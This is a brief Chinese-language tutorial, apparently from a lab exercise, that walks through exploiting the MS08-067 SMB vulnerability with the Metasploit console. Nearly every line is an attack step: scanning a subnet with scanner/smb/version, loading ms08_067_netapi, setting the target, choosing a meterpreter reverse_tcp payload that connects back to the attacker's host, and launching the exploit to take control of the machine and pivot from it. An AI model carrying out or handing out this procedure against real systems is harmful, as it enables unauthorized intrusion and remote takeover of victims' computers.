控制台是较为方便的操作接口,因此在命令行下输入msfconsole命令进入控制台
考虑到ms08-067是比较普遍也是较容易上手的安全漏洞,因此拿它作练习
首先进行扫描,确定开放samba服务的主机
加载扫描模块,use scanner/smb/version
设定扫描范围,set rhosts 192.168.11.0/24
查找到192.168.11.2,操作系统为windows 2000
查询相关资料,该版本存在ms08-067漏洞
在控制台中输入search ms08_067,查询目前加载的所有安全漏洞攻击模块,
每个模块,根据攻击成功的可能性,有评价
加载选定的攻击模块,use windows/smb/ms08_067_netapi
输入show options,查看模块涉及的参数
设定目标主机的地址,set rhost 192.168.11.2
查询与攻击模块有关的攻击代码,search payload
一旦漏洞攻击成功,通过攻击代码取得控制权或进行破坏
设定选定的攻击代码,set payload windows/meterpreter/reverse_tcp
再次输入show options,查看攻击代码的相关参数
设定攻击主机的地址,set lhost 192.168.11.10 ,以便于传回连接
输入exploit发起攻击
可能一次不能取得成功,可以多试几次
成功后,返回meterpreter控制台,取得对目标主机的控制权
控制台提供了系统命令,可以用于跳板攻击。